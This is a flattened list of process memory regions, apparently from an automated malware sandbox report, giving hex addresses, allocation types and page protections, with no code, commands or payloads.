page read and write
|
||
|
7190000
|
heap
|
page read and write
|
||
|
25310000
|
trusted library allocation
|
page read and write
|
||
|
72B0000
|
heap
|
page read and write
|
||
|
2277C000
|
stack
|
page read and write
|
||
|
2552000
|
trusted library allocation
|
page read and write
|
||
|
22D62000
|
trusted library allocation
|
page read and write
|
||
|
2B3F1A5E000
|
heap
|
page read and write
|
||
|
22B2A000
|
stack
|
page read and write
|
||
|
4BEE000
|
stack
|
page read and write
|
||
|
2263E000
|
stack
|
page read and write
|
||
|
7FFD9B9E0000
|
trusted library allocation
|
page read and write
|
||
|
25310000
|
trusted library allocation
|
page read and write
|
||
|
2E9A000
|
trusted library allocation
|
page execute and read and write
|
||
|
7650000
|
trusted library allocation
|
page read and write
|
||
|
221D35E4000
|
heap
|
page read and write
|
||
|
2B3F1A9A000
|
heap
|
page read and write
|
||
|
22BC0000
|
heap
|
page read and write
|
||
|
25310000
|
trusted library allocation
|
page read and write
|
||
|
2B3F1A3E000
|
heap
|
page read and write
|
||
|
22DB0000
|
trusted library allocation
|
page read and write
|
||
|
22AE0000
|
direct allocation
|
page read and write
|
||
|
2B10000
|
heap
|
page read and write
|
||
|
8494000
|
heap
|
page read and write
|
||
|
25300000
|
trusted library allocation
|
page read and write
|
||
|
4620000
|
heap
|
page read and write
|
||
|
4F0C000
|
stack
|
page read and write
|
||
|
C7238FF000
|
stack
|
page read and write
|
||
|
2540000
|
trusted library allocation
|
page read and write
|
||
|
2E20000
|
heap
|
page read and write
|
||
|
24F30000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B774000
|
trusted library allocation
|
page read and write
|
||
|
25330000
|
trusted library allocation
|
page read and write
|
||
|
87F0000
|
direct allocation
|
page read and write
|
||
|
25300000
|
trusted library allocation
|
page read and write
|
||
|
8790000
|
direct allocation
|
page read and write
|
||
|
23E31000
|
trusted library allocation
|
page read and write
|
||
|
25300000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B770000
|
trusted library allocation
|
page read and write
|
||
|
2B3F1A5E000
|
heap
|
page read and write
|
||
|
221D5B1B000
|
trusted library allocation
|
page read and write
|
||
|
7279000
|
heap
|
page read and write
|
||
|
25360000
|
trusted library allocation
|
page read and write
|
||
|
25370000
|
trusted library allocation
|
page execute and read and write
|
||
|
4DAE000
|
stack
|
page read and write
|
||
|
94F6CFD000
|
stack
|
page read and write
|
||
|
25380000
|
trusted library allocation
|
page read and write
|
||
|
2B3F1A92000
|
heap
|
page read and write
|
||
|
221EBECA000
|
heap
|
page read and write
|
||
|
25310000
|
trusted library allocation
|
page read and write
|
||
|
22DA0000
|
heap
|
page read and write
|
||
|
8780000
|
direct allocation
|
page read and write
|
||
|
844C000
|
stack
|
page read and write
|
||
|
25C00000
|
trusted library allocation
|
page read and write
|
||
|
27E0000
|
heap
|
page read and write
|
||
|
25350000
|
trusted library allocation
|
page read and write
|
||
|
22A40000
|
remote allocation
|
page read and write
|
||
|
73D0000
|
direct allocation
|
page read and write
|
||
|
252E0000
|
trusted library allocation
|
page read and write
|
||
|
94F6EF9000
|
stack
|
page read and write
|
||
|
2B20000
|
heap
|
page read and write
|
||
|
AE69000
|
direct allocation
|
page execute and read and write
|
||
|
8450000
|
heap
|
page read and write
|
||
|
94F72FB000
|
stack
|
page read and write
|
||
|
503E000
|
stack
|
page read and write
|
||
|
6DC7000
|
trusted library allocation
|
page read and write
|
||
|
25310000
|
trusted library allocation
|
page read and write
|
||
|
25310000
|
trusted library allocation
|
page read and write
|
||
|
22EB9000
|
trusted library allocation
|
page read and write
|
||
|
22B69000
|
stack
|
page read and write
|
||
|
10007C000
|
stack
|
page read and write
|
||
|
221EBDF7000
|
heap
|
page execute and read and write
|
||
|
2DDE000
|
stack
|
page read and write
|
||
|
8200000
|
trusted library allocation
|
page read and write
|
||
|
25300000
|
trusted library allocation
|
page read and write
|
||
|
25300000
|
trusted library allocation
|
page read and write
|
||
|
22E00000
|
trusted library allocation
|
page read and write
|
||
|
2E60000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
|
25460000
|
trusted library allocation
|
page read and write
|
||
|
2E1E000
|
stack
|
page read and write
|
||
|
221D3F99000
|
trusted library allocation
|
page read and write
|
||
|
221D436D000
|
trusted library allocation
|
page read and write
|
||
|
2E73000
|
trusted library allocation
|
page execute and read and write
|
||
|
221D389F000
|
heap
|
page read and write
|
||
|
7FFD9BA10000
|
trusted library allocation
|
page read and write
|
||
|
7350000
|
direct allocation
|
page read and write
|
||
|
25C10000
|
trusted library allocation
|
page read and write
|
||
|
2B3F38C0000
|
heap
|
page read and write
|
||
|
221D4480000
|
trusted library allocation
|
page read and write
|
||
|
25301000
|
trusted library allocation
|
page read and write
|
||
|
8750000
|
direct allocation
|
page read and write
|
||
|
25C50000
|
trusted library allocation
|
page read and write
|
||
|
7495000
|
heap
|
page read and write
|
||
|
552E000
|
stack
|
page read and write
|
||
|
621000
|
unkown
|
page execute read
|
||
|
2B3F1A41000
|
heap
|
page read and write
|
||
|
25300000
|
trusted library allocation
|
page read and write
|
||
|
22EC0000
|
trusted library allocation
|
page read and write
|
||
|
25370000
|
trusted library allocation
|
page read and write
|
||
|
25300000
|
trusted library allocation
|
page read and write
|
||
|
25C10000
|
trusted library allocation
|
page read and write
|
||
|
22ABF000
|
stack
|
page read and write
|
||
|
63D000
|
unkown
|
page readonly
|
||
|
7242000
|
heap
|
page read and write
|
||
|
22D71000
|
trusted library allocation
|
page read and write
|
||
|
726C000
|
heap
|
page read and write
|
||
|
25C10000
|
trusted library allocation
|
page read and write
|
||
|
8498000
|
heap
|
page read and write
|
||
|
25310000
|
trusted library allocation
|
page read and write
|
||
|
9A69000
|
direct allocation
|
page execute and read and write
|
||
|
2E50000
|
trusted library section
|
page read and write
|
||
|
6E19000
|
remote allocation
|
page execute and read and write
|
||
|
22C0E000
|
stack
|
page read and write
|
||
|
25300000
|
trusted library allocation
|
page read and write
|
||
|
221D58EF000
|
trusted library allocation
|
page read and write
|
||
|
221D565B000
|
trusted library allocation
|
page read and write
|
||
|
25310000
|
trusted library allocation
|
page read and write
|
||
|
25310000
|
trusted library allocation
|
page read and write
|
||
|
221D1AC0000
|
heap
|
page read and write
|
||
|
252DE000
|
stack
|
page read and write
|
||
|
226FE000
|
stack
|
page read and write
|
||
|
20971BA7000
|
heap
|
page read and write
|
||
|
76F0000
|
trusted library allocation
|
page read and write
|
||
|
2530000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B830000
|
trusted library allocation
|
page execute and read and write
|
||
|
221D1BF4000
|
heap
|
page read and write
|
||
|
7FFD9B820000
|
trusted library allocation
|
page read and write
|
||
|
25300000
|
trusted library allocation
|
page read and write
|
||
|
2534000
|
trusted library allocation
|
page read and write
|
||
|
72C1000
|
heap
|
page read and write
|
||
|
2B3F19E0000
|
heap
|
page read and write
|
||
|
2B3F1AC3000
|
heap
|
page read and write
|
||
|
2B3F1A5C000
|
heap
|
page read and write
|
||
|
8660000
|
trusted library allocation
|
page read and write
|
||
|
73C0000
|
heap
|
page read and write
|
||
|
25C40000
|
trusted library allocation
|
page read and write
|
||
|
252F0000
|
trusted library allocation
|
page read and write
|
||
|
4B8F000
|
stack
|
page read and write
|
||
|
7FFD9B780000
|
trusted library allocation
|
page read and write
|
||
|
2B3F1A10000
|
heap
|
page read and write
|
||
|
24F9B000
|
stack
|
page read and write
|
||
|
94F699E000
|
stack
|
page read and write
|
||
|
2F78000
|
trusted library allocation
|
page read and write
|
||
|
2CAD000
|
heap
|
page read and write
|
||
|
2B3F1A70000
|
heap
|
page read and write
|
||
|
221EBEE3000
|
heap
|
page read and write
|
||
|
2B3F1A71000
|
heap
|
page read and write
|
||
|
2AA8000
|
heap
|
page read and write
|
||
|
7FFD9B921000
|
trusted library allocation
|
page read and write
|
||
|
2B3F1A0F000
|
heap
|
page read and write
|
||
|
221D1D70000
|
heap
|
page readonly
|
||
|
2533000
|
trusted library allocation
|
page execute and read and write
|
||
|
25310000
|
trusted library allocation
|
page read and write
|
||
|
94F7D4D000
|
stack
|
page read and write
|
||
|
840E000
|
stack
|
page read and write
|
||
|
74D0000
|
trusted library allocation
|
page read and write
|
||
|
221D1D80000
|
trusted library allocation
|
page read and write
|
||
|
6419000
|
remote allocation
|
page execute and read and write
|
||
|
25310000
|
trusted library allocation
|
page read and write
|
||
|
25310000
|
trusted library allocation
|
page read and write
|
||
|
25300000
|
trusted library allocation
|
page read and write
|
||
|
25320000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B77D000
|
trusted library allocation
|
page execute and read and write
|
||
|
25300000
|
trusted library allocation
|
page read and write
|
||
|
275B000
|
stack
|
page read and write
|
||
|
25300000
|
trusted library allocation
|
page read and write
|
||
|
267D000
|
stack
|
page read and write
|
||
|
277D000
|
stack
|
page read and write
|
||
|
2B3F38CD000
|
heap
|
page read and write
|
||
|
2F9A000
|
heap
|
page read and write
|
||
|
2B3F1A5E000
|
heap
|
page read and write
|
||
|
22840000
|
heap
|
page read and write
|
||
|
714E000
|
stack
|
page read and write
|
||
|
2E70000
|
trusted library allocation
|
page read and write
|
||
|
748A000
|
heap
|
page read and write
|
||
|
2A90000
|
heap
|
page read and write
|
||
|
221D4451000
|
trusted library allocation
|
page read and write
|
||
|
25C10000
|
trusted library allocation
|
page read and write
|
||
|
221D3826000
|
heap
|
page read and write
|
||
|
7FFD9B790000
|
trusted library allocation
|
page read and write
|
||
|
2D38000
|
heap
|
page read and write
|
||
|
2E7D000
|
trusted library allocation
|
page execute and read and write
|
||
|
627000
|
unkown
|
page readonly
|
||
|
7FFD9BAC0000
|
trusted library allocation
|
page read and write
|
||
|
8487000
|
heap
|
page read and write
|
||
|
252E8000
|
trusted library allocation
|
page read and write
|
||
|
477C000
|
stack
|
page read and write
|
||
|
1C006A85000
|
heap
|
page read and write
|
||
|
221D38F0000
|
heap
|
page execute and read and write
|
||
|
7700000
|
trusted library allocation
|
page read and write
|
||
|
227A0000
|
trusted library allocation
|
page read and write
|
||
|
72F9000
|
heap
|
page read and write
|
||
|
7FFD9B82C000
|
trusted library allocation
|
page execute and read and write
|
||
|
221D37D0000
|
heap
|
page read and write
|
||
|
221D3E2C000
|
trusted library allocation
|
page read and write
|
||
|
53EF000
|
stack
|
page read and write
|
||
|
4CAE000
|
stack
|
page read and write
|
||
|
22BB0000
|
trusted library allocation
|
page read and write
|
||
|
25350000
|
trusted library allocation
|
page read and write
|
||
|
2B3F1A67000
|
heap
|
page read and write
|
||
|
7FFD9BA40000
|
trusted library allocation
|
page read and write
|
||
|
25C10000
|
trusted library allocation
|
page read and write
|
||
|
221D3E3B000
|
trusted library allocation
|
page read and write
|
||
|
25300000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BAE0000
|
trusted library allocation
|
page read and write
|
||
|
221D3B27000
|
trusted library allocation
|
page read and write
|
||
|
2B3F3480000
|
heap
|
page read and write
|
||
|
7310000
|
heap
|
page readonly
|
||
|
81E0000
|
heap
|
page read and write
|
||
|
625000
|
unkown
|
page readonly
|
||
|
4B69000
|
stack
|
page read and write
|
||
|
9069000
|
direct allocation
|
page execute and read and write
|
||
|
221D4431000
|
trusted library allocation
|
page read and write
|
||
|
2B3F1DA5000
|
heap
|
page read and write
|
||
|
72BF000
|
heap
|
page read and write
|
||
|
25300000
|
trusted library allocation
|
page read and write
|
||
|
221D38C5000
|
heap
|
page read and write
|
||
|
2B3F1BD0000
|
heap
|
page read and write
|
||
|
2267E000
|
stack
|
page read and write
|
||
|
73A0000
|
trusted library allocation
|
page read and write
|
||
|
25C10000
|
trusted library allocation
|
page read and write
|
||
|
2B3F1A84000
|
heap
|
page read and write
|
||
|
449E000
|
stack
|
page read and write
|
||
|
4900000
|
heap
|
page read and write
|
||
|
221EBEDF000
|
heap
|
page read and write
|
||
|
221D58DC000
|
trusted library allocation
|
page read and write
|
||
|
838C000
|
stack
|
page read and write
|
||
|
25C00000
|
trusted library allocation
|
page read and write
|
||
|
25310000
|
trusted library allocation
|
page read and write
|
||
|
87E0000
|
direct allocation
|
page read and write
|
||
|
94F7CCE000
|
stack
|
page read and write
|
||
|
221D1B77000
|
heap
|
page read and write
|
||
|
2B3F1A84000
|
heap
|
page read and write
|
||
|
2B3F1A22000
|
heap
|
page read and write
|
||
|
4A68000
|
trusted library allocation
|
page read and write
|
||
|
22D90000
|
trusted library allocation
|
page read and write
|
||
|
221D4427000
|
trusted library allocation
|
page read and write
|
||
|
25460000
|
trusted library allocation
|
page read and write
|
||
|
3108000
|
heap
|
page read and write
|
||
|
7208000
|
heap
|
page read and write
|
||
|
8120000
|
trusted library allocation
|
page read and write
|
||
|
2D6E000
|
heap
|
page read and write
|
||
|
2B3F1BB0000
|
heap
|
page read and write
|
||
|
5939000
|
trusted library allocation
|
page read and write
|
||
|
25300000
|
trusted library allocation
|
page read and write
|
||
|
2CA0000
|
heap
|
page read and write
|
||
|
3152000
|
heap
|
page read and write
|
||
|
8710000
|
trusted library allocation
|
page read and write
|
||
|
252F0000
|
trusted library allocation
|
page read and write
|
||
|
486E000
|
stack
|
page read and write
|
||
|
2282F000
|
stack
|
page read and write
|
||
|
221D54F7000
|
trusted library allocation
|
page read and write
|
||
|
25320000
|
trusted library allocation
|
page read and write
|
||
|
221D1DB0000
|
trusted library allocation
|
page read and write
|
||
|
221D387D000
|
heap
|
page read and write
|
||
|
740A000
|
heap
|
page read and write
|
||
|
2B1F000
|
unkown
|
page read and write
|
||
|
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
|
25C60000
|
trusted library allocation
|
page execute and read and write
|
||
|
620000
|
unkown
|
page readonly
|
||
|
2DFB000
|
stack
|
page read and write
|
||
|
7400000
|
heap
|
page read and write
|
||
|
6EDE000
|
stack
|
page read and write
|
||
|
25303000
|
trusted library allocation
|
page read and write
|
||
|
2B3F1A69000
|
heap
|
page read and write
|
||
|
22E9F000
|
trusted library allocation
|
page read and write
|
||
|
4619000
|
remote allocation
|
page execute and read and write
|
||
|
25320000
|
trusted library allocation
|
page read and write
|
||
|
4760000
|
heap
|
page read and write
|
||
|
2A4D000
|
stack
|
page read and write
|
||
|
330F000
|
stack
|
page read and write
|
||
|
74E0000
|
trusted library allocation
|
page read and write
|
||
|
252E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BAB0000
|
trusted library allocation
|
page read and write
|
||
|
1C006720000
|
heap
|
page read and write
|
||
|
25B5000
|
heap
|
page read and write
|
||
|
77EEEFF000
|
stack
|
page read and write
|
||
|
1C006868000
|
heap
|
page read and write
|
||
|
7390000
|
heap
|
page execute and read and write
|
||
|
221D3E37000
|
trusted library allocation
|
page read and write
|
||
|
741A000
|
heap
|
page read and write
|
||
|
94F6E7D000
|
stack
|
page read and write
|
||
|
252F0000
|
trusted library allocation
|
page read and write
|
||
|
25300000
|
trusted library allocation
|
page read and write
|
||
|
7200000
|
heap
|
page read and write
|
||
|
221EBDF0000
|
heap
|
page execute and read and write
|
||
|
84A4000
|
heap
|
page read and write
|
||
|
221D3901000
|
trusted library allocation
|
page read and write
|
||
|
221EC190000
|
heap
|
page read and write
|
||
|
25302000
|
trusted library allocation
|
page read and write
|
||
|
25C40000
|
trusted library allocation
|
page read and write
|
||
|
6F1A000
|
stack
|
page read and write
|
||
|
25320000
|
trusted library allocation
|
page read and write
|
||
|
76E0000
|
trusted library allocation
|
page read and write
|
||
|
5A19000
|
remote allocation
|
page execute and read and write
|
||
|
2CB0000
|
heap
|
page read and write
|
||
|
7FFD9B952000
|
trusted library allocation
|
page read and write
|
||
|
4D00000
|
heap
|
page read and write
|
||
|
556F000
|
stack
|
page read and write
|
||
|
221D3824000
|
heap
|
page read and write
|
||
|
76B0000
|
trusted library allocation
|
page read and write
|
||
|
6E1B000
|
stack
|
page read and write
|
||
|
22DC0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BAA0000
|
trusted library allocation
|
page read and write
|
||
|
25C10000
|
trusted library allocation
|
page read and write
|
||
|
25300000
|
trusted library allocation
|
page read and write
|
||
|
25C30000
|
trusted library allocation
|
page read and write
|
||
|
25310000
|
trusted library allocation
|
page read and write
|
||
|
22930000
|
heap
|
page read and write
|
||
|
8100000
|
trusted library allocation
|
page execute and read and write
|
||
|
8740000
|
direct allocation
|
page read and write
|
||
|
7FFD9B92A000
|
trusted library allocation
|
page read and write
|
||
|
22DFC000
|
stack
|
page read and write
|
||
|
4D80000
|
heap
|
page read and write
|
||
|
25300000
|
trusted library allocation
|
page read and write
|
||
|
34F0000
|
heap
|
page read and write
|
||
|
221D4478000
|
trusted library allocation
|
page read and write
|
||
|
221D1E35000
|
heap
|
page read and write
|
||
|
A469000
|
direct allocation
|
page execute and read and write
|
There are 869 hidden memdumps, click here to show them.